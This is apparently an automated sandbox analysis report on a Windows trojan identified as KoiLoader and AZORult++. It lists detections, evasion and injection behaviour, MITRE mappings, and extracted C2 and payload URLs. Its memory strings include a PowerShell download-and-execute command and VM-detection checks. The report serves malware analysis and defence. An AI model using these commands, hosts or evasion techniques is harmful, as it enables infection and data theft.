Edit tour

Windows Analysis Report
DWbCUTdGhV.exe

Overview

General Information

Sample name:	DWbCUTdGhV.exe renamed because original name is a hash value
Original sample name:	13b4c5dff00cf1ea8a635743903e387f.exe
Analysis ID:	1528826
MD5:	13b4c5dff00cf1ea8a635743903e387f
SHA1:	de5d0e9a174171257a9539117d82659bbad98139
SHA256:	af816c7bf551987a9d5cfd0fa2237807eba659fa271fdab041357aa9e8969e51
Tags:	exeKoiLoaderuser-abuse_ch
Infos:

Detection

AZORult++, KoiLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected AZORult++ Trojan

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected KoiLoader

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Contain functionality to detect virtual machines

Contains functionality to compare user and computer (likely to detect sandboxes)

Contains functionality to inject code into remote processes

Found evasive API chain (may stop execution after checking mutex)

Machine Learning detection for sample

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

Program does not show much activity (idle)

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

System is w10x64

DWbCUTdGhV.exe (PID: 2132 cmdline: "C:\Users\user\Desktop\DWbCUTdGhV.exe" MD5: 13B4C5DFF00CF1EA8A635743903E387F)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Koi Loader		No Attribution	https://www.esentire.com/blog/unraveling-not-azorult-but-koi-loader-a-precursor-to-koi-stealer	https://malpedia.caad.fkie.fraunhofer.de/details/win.koiloader

Malware Configuration

Threatname: KoiLoader

{"C2": "http://121.127.33.20/fermentum.php", "Payload url": "https://kionaonline.com/modules/bonslick"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_KoiLoader_1	Yara detected KoiLoader	Joe Security
00000000.00000002.2121629696.00000000013BE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_KoiLoader_1	Yara detected KoiLoader	Joe Security
Process Memory Space: DWbCUTdGhV.exe PID: 2132	JoeSecurity_KoiLoader_1	Yara detected KoiLoader	Joe Security

Unpacked PEs

Source	Rule	Description	Author
0.2.DWbCUTdGhV.exe.13dfc40.2.unpack	JoeSecurity_KoiLoader_1	Yara detected KoiLoader	Joe Security
0.2.DWbCUTdGhV.exe.11f0000.1.unpack	JoeSecurity_KoiLoader_1	Yara detected KoiLoader	Joe Security
0.2.DWbCUTdGhV.exe.13dfc40.2.raw.unpack	JoeSecurity_KoiLoader_1	Yara detected KoiLoader	Joe Security

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: DWbCUTdGhV.exe

Avira: detected

Found malware configuration

Source: 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: KoiLoader {"C2": "http://121.127.33.20/fermentum.php", "Payload url": "https://kionaonline.com/modules/bonslick"}

Multi AV Scanner detection for submitted file

Source: DWbCUTdGhV.exe	ReversingLabs: Detection: 71%
Source: DWbCUTdGhV.exe	Virustotal: Detection: 76%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: DWbCUTdGhV.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\DWbCUTdGhV.exe	Code function: 0_2_011F8316 InitializeCriticalSection,GetVolumeInformationW,StringFromGUID2,wsprintfA,CreateMutexW,GetLastError,WSAStartup,CryptAcquireContextA,CryptAcquireContextA,CoInitializeEx,ExpandEnvironmentStringsW,CreateFileW,	0_2_011F8316
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe	Code function: 0_2_011F8340 InitializeCriticalSection,GetVolumeInformationW,StringFromGUID2,wsprintfA,CreateMutexW,GetLastError,WSAStartup,CryptAcquireContextA,CryptAcquireContextA,CoInitializeEx,ExpandEnvironmentStringsW,CreateFileW,ExitProcess,	0_2_011F8340
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe	Code function: 0_2_011F8F40 CryptGenRandom,HeapFree,GetProcessHeap,HeapFree,wsprintfA,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,	0_2_011F8F40

Source: DWbCUTdGhV.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: DWbCUTdGhV.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\DWbCUTdGhV.exe	Code function: 0_2_00798ACD FindFirstFileExW,		0_2_00798ACD
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe	Code function: 0_2_011F8620 EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,StrStrIW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,GlobalMemoryStatusEx,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,StrStrIW,GetModuleFileNameW,StrStrIW,		0_2_011F8620

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://121.127.33.20/fermentum.php

Source: C:\Users\user\Desktop\DWbCUTdGhV.exe

Code function: 0_2_011F62B0 inet_pton,inet_pton,htons,htons,inet_pton,htons,socket,socket,connect,connect,socket,connect,select,recv,send,select,closesocket,closesocket,GetProcessHeap,HeapFree,

0_2_011F62B0

Source: DWbCUTdGhV.exe	String found in binary or memory: http://121.127.33.20/fermentum.php
Source: DWbCUTdGhV.exe, 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp, DWbCUTdGhV.exe, 00000000.00000002.2121629696.00000000013BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://121.127.33.20/fermentum.php%temp%
Source: DWbCUTdGhV.exe	String found in binary or memory: https://kionaonline.com/modules/bonslick
Source: DWbCUTdGhV.exe, 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp, DWbCUTdGhV.exe, 00000000.00000002.2121629696.00000000013BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://kionaonline.com/modules/bonslick/c

E-Banking Fraud

Detected AZORult++ Trojan

Source: C:\Users\user\Desktop\DWbCUTdGhV.exe

Code function: 0_2_011F8DD0 EntryPoint,GetUserDefaultLangID,ExitProcess,

0_2_011F8DD0

Source: C:\Users\user\Desktop\DWbCUTdGhV.exe	Code function: 0_2_011F5E70 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTempPathW,wnsprintfW,wnsprintfW,PathCombineW,CreateFileW,WriteFile,WriteFile,SetEndOfFile,SetFilePointer,wnsprintfW,RtlInitUnicodeString,RtlInitUnicodeString,RtlInitUnicodeString,GetCurrentProcess,SetFilePointer,WriteFile,FlushFileBuffers,SetEndOfFile,NtQueryInformationProcess,NtClose,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,NtClose,NtClose,NtClose,NtClose,CloseHandle,		0_2_011F5E70
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe	Code function: 0_2_011F5AF0 GetModuleHandleW,GetProcAddress,CreateProcessW,NtQueryInformationProcess,ReadProcessMemory,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,ReadProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,CloseHandle,		0_2_011F5AF0

Source: C:\Users\user\Desktop\DWbCUTdGhV.exe	Code function: 0_2_0079E87D	0_2_0079E87D
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe	Code function: 0_2_011F7440	0_2_011F7440
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe	Code function: 0_2_011F7860	0_2_011F7860
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe	Code function: 0_2_011F24A0	0_2_011F24A0
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe	Code function: 0_2_011F4260	0_2_011F4260
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe	Code function: 0_2_011F4660	0_2_011F4660

Source: C:\Users\user\Desktop\DWbCUTdGhV.exe	Code function: String function: 00793040 appears 46 times
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe	Code function: String function: 00794480 appears 33 times

Source: DWbCUTdGhV.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.bank.troj.evad.winEXE@1/0@0/0

Source: C:\Users\user\Desktop\DWbCUTdGhV.exe

Code function: 0_2_011F6210 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,CloseHandle,AdjustTokenPrivileges,CloseHandle,

0_2_011F6210

Source: C:\Users\user\Desktop\DWbCUTdGhV.exe

Code function: 0_2_011F6BC0 ExpandEnvironmentStringsW,VariantInit,CoCreateInstance,SysAllocString,SysAllocString,SysFreeString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,SysFreeString,VariantInit,SysAllocString,SysAllocString,SysFreeString,VariantClear,

0_2_011F6BC0

Source: C:\Users\user\Desktop\DWbCUTdGhV.exe

Command line argument: jhl46745fghb

0_2_00792F40

Source: DWbCUTdGhV.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\DWbCUTdGhV.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: DWbCUTdGhV.exe	ReversingLabs: Detection: 71%
Source: DWbCUTdGhV.exe	Virustotal: Detection: 76%

Source: C:\Users\user\Desktop\DWbCUTdGhV.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe	Section loaded: sspicli.dll	Jump to behavior

Source: DWbCUTdGhV.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: DWbCUTdGhV.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: DWbCUTdGhV.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: DWbCUTdGhV.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: DWbCUTdGhV.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: DWbCUTdGhV.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: DWbCUTdGhV.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: DWbCUTdGhV.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source: DWbCUTdGhV.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: DWbCUTdGhV.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: DWbCUTdGhV.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: DWbCUTdGhV.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: DWbCUTdGhV.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Yara detected KoiLoader

Source: Yara match	File source: 0.2.DWbCUTdGhV.exe.13dfc40.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DWbCUTdGhV.exe.11f0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DWbCUTdGhV.exe.13dfc40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2121629696.00000000013BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: DWbCUTdGhV.exe PID: 2132, type: MEMORYSTR

Source: C:\Users\user\Desktop\DWbCUTdGhV.exe

Code function: 0_2_00791300 GetModuleHandleA,VirtualAlloc,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualFree,VirtualProtect,

0_2_00791300

Malware Analysis System Evasion

Contain functionality to detect virtual machines

Source: C:\Users\user\Desktop\DWbCUTdGhV.exe

Code function: VMWare %systemroot%\System32\VBoxService.exe %systemroot%\System32\VBoxService.exe %systemroot%\System32\VBoxTray.exe

0_2_011F8620

Contains functionality to compare user and computer (likely to detect sandboxes)

Source: C:\Users\user\Desktop\DWbCUTdGhV.exe

Code function: EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,StrStrIW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,GlobalMemoryStatusEx,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,StrStrIW,GetModuleFileNameW,StrStrIW,

0_2_011F8620

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Users\user\Desktop\DWbCUTdGhV.exe

Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess

graph_0-11755

Source: C:\Users\user\Desktop\DWbCUTdGhV.exe

File opened / queried: C:\Windows\System32\VBoxService.exe

Jump to behavior

Source: C:\Users\user\Desktop\DWbCUTdGhV.exe

API coverage: 9.8 %

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\DWbCUTdGhV.exe	Code function: 0_2_00798ACD FindFirstFileExW,		0_2_00798ACD
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe	Code function: 0_2_011F8620 EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,StrStrIW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,GlobalMemoryStatusEx,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,StrStrIW,GetModuleFileNameW,StrStrIW,		0_2_011F8620

Source: DWbCUTdGhV.exe	Binary or memory string: Hyper-V
Source: DWbCUTdGhV.exe, 00000000.00000002.2121629696.00000000013BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: POST%s\|%s\|VoYGkc5RStart%d\|%sINITWindowsPowerShell\v1.0\powershell.exe -enc %S%ComSpec% /c %Skernel32Wow64DisableWow64FsRedirectionWow64RevertWow64FsRedirectionShellExecuteWshell32openReleaseSeShutdownPrivilege%Shttp://121.127.33.20/fermentum.php%temp%\%paths%%SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe%SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exesd2.ps1sd4.ps1https://kionaonline.com/modules/bonslick/c "powershell -command IEX(IWR -UseBasicParsing '%s/%s')"Hyper-VVMWareParallels Display AdapterRed Hat QXL controller%systemroot%\System32\VBoxService.exe%systemroot%\System32\VBoxTray.exe?
Source: DWbCUTdGhV.exe	Binary or memory string: VMWare
Source: DWbCUTdGhV.exe	Binary or memory string: %systemroot%\System32\VBoxService.exe
Source: DWbCUTdGhV.exe	Binary or memory string: %systemroot%\System32\VBoxTray.exe

Source: C:\Users\user\Desktop\DWbCUTdGhV.exe	API call chain: ExitProcess graph end node			graph_0-11758
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe	API call chain: ExitProcess graph end node			graph_0-10419

Source: C:\Users\user\Desktop\DWbCUTdGhV.exe

Code function: 0_2_0079695B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_0079695B

Source: C:\Users\user\Desktop\DWbCUTdGhV.exe

Code function: 0_2_00791300 GetModuleHandleA,VirtualAlloc,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualFree,VirtualProtect,

0_2_00791300

Source: C:\Users\user\Desktop\DWbCUTdGhV.exe	Code function: 0_2_00791710 mov ecx, dword ptr fs:[00000030h]	0_2_00791710
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe	Code function: 0_2_007975A2 mov eax, dword ptr fs:[00000030h]	0_2_007975A2
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe	Code function: 0_2_00799763 mov eax, dword ptr fs:[00000030h]	0_2_00799763
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe	Code function: 0_2_011F7650 mov eax, dword ptr fs:[00000030h]	0_2_011F7650
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe	Code function: 0_2_011F5E70 mov eax, dword ptr fs:[00000030h]	0_2_011F5E70

Source: C:\Users\user\Desktop\DWbCUTdGhV.exe

Code function: 0_2_0079A845 GetProcessHeap,

0_2_0079A845

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\DWbCUTdGhV.exe	Code function: 0_2_0079695B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0079695B
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe	Code function: 0_2_00793D4E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00793D4E
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe	Code function: 0_2_0079421C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0079421C
Source: C:\Users\user\Desktop\DWbCUTdGhV.exe	Code function: 0_2_007943AF SetUnhandledExceptionFilter,	0_2_007943AF

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\DWbCUTdGhV.exe

Code function: 0_2_011F5AF0 GetModuleHandleW,GetProcAddress,CreateProcessW,NtQueryInformationProcess,ReadProcessMemory,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,ReadProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,CloseHandle,

0_2_011F5AF0

Source: C:\Users\user\Desktop\DWbCUTdGhV.exe

Code function: 0_2_007944C5 cpuid

0_2_007944C5

Source: C:\Users\user\Desktop\DWbCUTdGhV.exe

Code function: 0_2_00794103 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00794103

Source: C:\Users\user\Desktop\DWbCUTdGhV.exe

Code function: 0_2_011F8620 EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,StrStrIW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,GlobalMemoryStatusEx,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,StrStrIW,GetModuleFileNameW,StrStrIW,

0_2_011F8620

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	1 Access Token Manipulation	11 Virtualization/Sandbox Evasion	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	11 Native API	Boot or Logon Initialization Scripts	1 Process Injection	1 Access Token Manipulation	LSASS Memory	231 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Process Injection	Security Account Manager	11 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	1 Account Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	1 System Owner/User Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	12 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
DWbCUTdGhV.exe	71%	ReversingLabs	Win32.Trojan.AZORult
DWbCUTdGhV.exe	76%	Virustotal		Browse
DWbCUTdGhV.exe	100%	Avira	TR/Kryptik.hgffj
DWbCUTdGhV.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Link
https://kionaonline.com/modules/bonslick	0%	Virustotal	Browse
http://121.127.33.20/fermentum.php%temp%	0%	Virustotal	Browse
https://kionaonline.com/modules/bonslick/c	0%	Virustotal	Browse
http://121.127.33.20/fermentum.php	1%	Virustotal	Browse

Domains and IPs

Contacted Domains

⊘No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://121.127.33.20/fermentum.php	true	1%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://kionaonline.com/modules/bonslick	DWbCUTdGhV.exe	true	0%, Virustotal, Browse	unknown
http://121.127.33.20/fermentum.php%temp%	DWbCUTdGhV.exe, 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp, DWbCUTdGhV.exe, 00000000.00000002.2121629696.00000000013BE000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://kionaonline.com/modules/bonslick/c	DWbCUTdGhV.exe, 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp, DWbCUTdGhV.exe, 00000000.00000002.2121629696.00000000013BE000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown

World Map of Contacted IPs

⊘No contacted IP infos

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1528826
Start date and time:	2024-10-08 10:27:24 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 1m 56s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	2
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	DWbCUTdGhV.exe renamed because original name is a hash value
Original Sample Name:	13b4c5dff00cf1ea8a635743903e387f.exe
Detection:	MAL
Classification:	mal100.bank.troj.evad.winEXE@1/0@0/0
EGA Information:	Successful, ratio: 100%
